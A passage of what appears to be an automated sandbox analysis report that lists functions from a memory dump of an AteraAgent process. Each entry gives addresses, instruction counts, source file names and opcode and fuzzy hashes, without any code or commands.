                                                                                                                                                                                                                                          Function 00007FFD9B418D32 Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ca7e0ee1814ff01ebac79687ab1343209922d40f1209b40161c4e10977fd0808
                                                                                                                                                                                                                                          • Instruction ID: f3c14173597fbab2d73ab4a09881e7413d2eb37208279bcac271b595a79df184
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca7e0ee1814ff01ebac79687ab1343209922d40f1209b40161c4e10977fd0808
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89718F70E0965D8FDB94DFA8C854BE97BB1FF6A304F1001AAE00DE72A2CA395941CB41
                                                                                                                                                                                                                                          Function 00007FFD9B414667 Relevance: .2, Instructions: 217COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1274bc55f4173761aae5a2b9e3be7be4340d8259a0cb4fea27397ed04de3bd6b
                                                                                                                                                                                                                                          • Instruction ID: ef305c6f86e404fbb1752c80272895a10a673323f30cebb24c795b913bcc8d44
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1274bc55f4173761aae5a2b9e3be7be4340d8259a0cb4fea27397ed04de3bd6b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5711970A18A4E8FDB84EF58C895AADB7F1FF68304F504279D41DD729ADA34A842CB40
                                                                                                                                                                                                                                          Function 00007FFD9B418A55 Relevance: .2, Instructions: 216COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b86c57f0ef4875bef89901e1cf9ba056934fc995fe30d3f869e0a64c0345fec8
                                                                                                                                                                                                                                          • Instruction ID: e019f2a49ef0500debef664ceb577089521f0f5dd38347ed27585a5a1a4ec0c2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b86c57f0ef4875bef89901e1cf9ba056934fc995fe30d3f869e0a64c0345fec8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E61F171E0A64D8FEB64DBA4D4656FDBBB0FF66318F05017AD00CE72A2CA396942C741
                                                                                                                                                                                                                                          Function 00007FFD9B41E648 Relevance: .2, Instructions: 215COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f6b527cbbd31d23e94084a435b094c8e5dd869f19dbea0cbad0ba259254434bb
                                                                                                                                                                                                                                          • Instruction ID: 45d3369039f5532e8200ec83ab40db8c43a588f3a6b659fe24522dddd97b0238
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6b527cbbd31d23e94084a435b094c8e5dd869f19dbea0cbad0ba259254434bb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43512F3071AA0E4FE7689B9DD894A7173E0FF99718B15067AD44DC3362DA29F8829780
                                                                                                                                                                                                                                          Function 00007FFD9B4180DD Relevance: .2, Instructions: 207COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5d3c290a358bfa533906c6220508c149f2709f9eb7a81f78004debbdd758d0c9
                                                                                                                                                                                                                                          • Instruction ID: 71909244b00d55b86252f00f3b307baff4906f3f0494767db767b7879818c974
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d3c290a358bfa533906c6220508c149f2709f9eb7a81f78004debbdd758d0c9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D814A70E1961D8FEB68EB98C8647FDB7B1EF54305F5011BAD019E32A2DB382A44DB41
                                                                                                                                                                                                                                          Function 00007FFD9B41A840 Relevance: .2, Instructions: 207COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 884bc25fd4564b2187f44782bf7905d25a6c6a2ca19d557e54b8d9403fa00e3a
                                                                                                                                                                                                                                          • Instruction ID: 3a528a830b53ad3a8b20ca61b5d5ee1543c411fce6c50b71d574a8f397c65ac6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 884bc25fd4564b2187f44782bf7905d25a6c6a2ca19d557e54b8d9403fa00e3a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E951FB12F1F59E0BFB7576E864314F86B61EF20768B0923F7D0BC460E79C4879865281
                                                                                                                                                                                                                                          Function 00007FFD9B41A848 Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 908b91d2901aeb34db515861a4d56ce8b404b9461ef9b81cc37270f67442412a
                                                                                                                                                                                                                                          • Instruction ID: 27c557a7028dfe6718070618c426bce7d3934542616462b734c63be951910a26
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 908b91d2901aeb34db515861a4d56ce8b404b9461ef9b81cc37270f67442412a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC51E912E1F59E0BFB7676E864314F86B61EF20768B0963F7D0BC460EB9C4879865281
                                                                                                                                                                                                                                          Function 00007FFD9B415B6A Relevance: .2, Instructions: 187COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0b6c63cd8acb12d1a805130467ec7905326b6bff8b479edd1f07841548e1c208
                                                                                                                                                                                                                                          • Instruction ID: 5689bbbc0f825560420f72bd7d77d1910ff47fdb6d9a9582c6a793c6a107a876
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b6c63cd8acb12d1a805130467ec7905326b6bff8b479edd1f07841548e1c208
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F651363190E6988FE751DF68C8647E97BF1FF96300F1541EAD048DB2A2CA7A5D82CB40
                                                                                                                                                                                                                                          Function 00007FFD9B424BF0 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: dcbf6ededccef324e78ae23521fe8ec011c4085b25db121b3870e1958451f116
                                                                                                                                                                                                                                          • Instruction ID: b76d087b696c42af6af9913266444f3830db0437fe4ec0ec41d31adee78d7d8c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dcbf6ededccef324e78ae23521fe8ec011c4085b25db121b3870e1958451f116
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E512B21B1ED4D0FE7B9D7AC846567937D2EF98354B0A01BED04EC72E6DE18AD429380
                                                                                                                                                                                                                                          Function 00007FFD9B41ADFA Relevance: .2, Instructions: 181COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5ad45cf0800326f9c5c36260173ff25f122ab1c0a3c20e454506cbe86537c19d
                                                                                                                                                                                                                                          • Instruction ID: c4d33880d4479557cd1ed1553b7bd79c5ec1e2a85964515b605bc1f89e0715a9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ad45cf0800326f9c5c36260173ff25f122ab1c0a3c20e454506cbe86537c19d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E413622F5EE4E0FE7A8DB6C94606B933D1FFE8264B05127BD05CC72A6ED18E8024341
                                                                                                                                                                                                                                          Function 00007FFD9B4105A0 Relevance: .2, Instructions: 173COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ef3477114f300901f59ca9f19597348df87a4431eaa4bb3c8ccbf62226684ee1
                                                                                                                                                                                                                                          • Instruction ID: 8b9f1b54966f13048d600ae4696a0bd9a600ea3e8a688c7fac4e91fad03e1118
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef3477114f300901f59ca9f19597348df87a4431eaa4bb3c8ccbf62226684ee1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26517930E1A61D9FEB68DB98D4656FDBBB1FF68304F111039E00EE32A1CA396941DB40
                                                                                                                                                                                                                                          Function 00007FFD9B42AFC9 Relevance: .2, Instructions: 172COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a7516de2d035a6512fbc654b383ab21c95e8ee1a472cd41028d94265c72e8bb9
                                                                                                                                                                                                                                          • Instruction ID: 3aa92f905744f6fa413ef127b7628d06cabbbc2467bb12589b88a3433c454b64
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7516de2d035a6512fbc654b383ab21c95e8ee1a472cd41028d94265c72e8bb9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC513C70E0965D8FDB68DFA8C4A4BEDBBB1FF18304F51006AD409E7292DB396985DB00
                                                                                                                                                                                                                                          Function 00007FFD9B423C30 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a9f6efdca32fc1c4040a736ef303cbf18ee0ae05ddd9fc523409993bcc3543ed
                                                                                                                                                                                                                                          • Instruction ID: 917b88ff723a54050ff431424715d450cbbb042f4b981889cf04e2488f354661
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9f6efdca32fc1c4040a736ef303cbf18ee0ae05ddd9fc523409993bcc3543ed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7041D23061AE0E4FE7689B98C894A7173E1FF98318B56067DD44DC72A6DA35F882D780
                                                                                                                                                                                                                                          Function 00007FFD9B418AA5 Relevance: .2, Instructions: 167COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2d6afb70f3925670e57d2666e41e4bd91b5cc527ccd86d38cf1fdc9cb2652014
                                                                                                                                                                                                                                          • Instruction ID: 3fa432450f1668cc717a7e7d7ce498b5719b567d1de80fda930c0e82b6346ae7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d6afb70f3925670e57d2666e41e4bd91b5cc527ccd86d38cf1fdc9cb2652014
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67513470E0A65D8FEB55DBA8D8656E97BF0FF65314F0501BAD008EB2E2CA3D2942C741
                                                                                                                                                                                                                                          Function 00007FFD9B41CD7D Relevance: .2, Instructions: 164COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6b0b34a8ceccf094027818570a5e6b1ed6d0eddf78e0e80aed98134784a47616
                                                                                                                                                                                                                                          • Instruction ID: 301b359a871c29b173895bfb36f7a0cc2ed8345bbb32cf036bed1065731dd1d9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b0b34a8ceccf094027818570a5e6b1ed6d0eddf78e0e80aed98134784a47616
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90411832F1DA2A9BD768EA5CF8551EC73D1EFE8361701117BD149C72A2CE25BC0282C0
                                                                                                                                                                                                                                          Function 00007FFD9B412F38 Relevance: .2, Instructions: 162COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2a8cf4220ac88838d35158f2d1d294adfd36eae1e17b680329b48c34b3d886da
                                                                                                                                                                                                                                          • Instruction ID: 8ea1cd0293982d982b8b39ee30db9f42acb8f28488d4bad0cc79e69b783591ab
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a8cf4220ac88838d35158f2d1d294adfd36eae1e17b680329b48c34b3d886da
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62513A70A09A0D8FDF54EFA8C854AEDBBF2FF19305F51016AE00DE3291DA75A951CB40
                                                                                                                                                                                                                                          Function 00007FFD9B41F5C4 Relevance: .2, Instructions: 162COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3cb3b491ab2c9081246a58cf230963a8a0f003081de49f4d6f5cd34cf8919edc
                                                                                                                                                                                                                                          • Instruction ID: 86441c0dcbddb9109550ee60236866c42bfa71d467c698da78ff8fced93e154b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3cb3b491ab2c9081246a58cf230963a8a0f003081de49f4d6f5cd34cf8919edc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D513471E1591D4FEBA4DB5C88A97A8B3E1FF68354F0002F5E41DD32A6DE346E828B40
                                                                                                                                                                                                                                          Function 00007FFD9B422A2D Relevance: .2, Instructions: 153COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3c4a947e717351c9305c9283640eab9f7c79f5b497e01703c7e192f94963a9b3
                                                                                                                                                                                                                                          • Instruction ID: 6af4e93f4caa49f5128cfb9cfc61ebe6db0d622b982e67c368a5c102ba0006ac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c4a947e717351c9305c9283640eab9f7c79f5b497e01703c7e192f94963a9b3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83412331B0EE494FE7A9DAAC98A5A3137D1EF6530871A00FAE449CB2B3DD25EC41D341
                                                                                                                                                                                                                                          Function 00007FFD9B42F011 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: fc7748d4b393605ec25aa63a69b8e6afb6a950af67d92fbb50675bc871c52298
                                                                                                                                                                                                                                          • Instruction ID: 3564ea1e156491b078dc0c9cf1545bfc36c4df4520e8c787ca384fa8774649e0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc7748d4b393605ec25aa63a69b8e6afb6a950af67d92fbb50675bc871c52298
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5413820B0D94D0FE798EB6C9829A7577D2EF99714B8501BEE44DC33E7DD19AC428340
                                                                                                                                                                                                                                          Function 00007FFD9B4104FA Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 211ebffef0851af8794caae3f017c607543bfd812f10e8aff003e62105b95841
                                                                                                                                                                                                                                          • Instruction ID: 8ac2d653a775e6504d03837aefad94383bdd69cb1f6b1a51182f3595d3f2bd1c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 211ebffef0851af8794caae3f017c607543bfd812f10e8aff003e62105b95841
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1417830E0961D8FEBA8DF98D8A57FE77B1FF58304F10007AD009E3295CA7969809B80
                                                                                                                                                                                                                                          Function 00007FFD9B41EA2D Relevance: .1, Instructions: 143COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 46446c1ce28fb2951afd0ef54d563d233c11f2f0105bbf8837ef9d489f3bddda
                                                                                                                                                                                                                                          • Instruction ID: 8bb0a5e2d03d2663dedaa932a95bdc0d0d38ce324ee2eb33ff23ba3e65e77c7d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 46446c1ce28fb2951afd0ef54d563d233c11f2f0105bbf8837ef9d489f3bddda
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B941F636F0A55D4FE768F76CE8A55E9BBA1FF50329F0402B7D04DC61A3DE2425828740
                                                                                                                                                                                                                                          Function 00007FFD9B420220 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 649e19c5e32b6a25cd9aac528d1ea94beb772237c3734346277520c3ac307de7
                                                                                                                                                                                                                                          • Instruction ID: 1902fee03a7033f2e95996e3f4e772dcd4e5029cfa27bd663f1075a64ca68001
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 649e19c5e32b6a25cd9aac528d1ea94beb772237c3734346277520c3ac307de7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10417030B1CA4E4FDBA8DF9884656BA37D1FFA8354F11017AE40ED32A5CE35E9029781
                                                                                                                                                                                                                                          Function 00007FFD9B425140 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 107c8c7ba49cf20c05be6ba8a076e6115dedff49b29ec8613baac295afe68879
                                                                                                                                                                                                                                          • Instruction ID: f9d5a0d8c55ec4617beb9adcd47a2b4ff28559efcc956d87a162a1d5d0039fc1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 107c8c7ba49cf20c05be6ba8a076e6115dedff49b29ec8613baac295afe68879
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8141C230B1DA498FEBA5EB6CC064E7277E1EF54304B1545B8D08AC72E6CE25F945DB40
                                                                                                                                                                                                                                          Function 00007FFD9B413C3D Relevance: .1, Instructions: 141COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
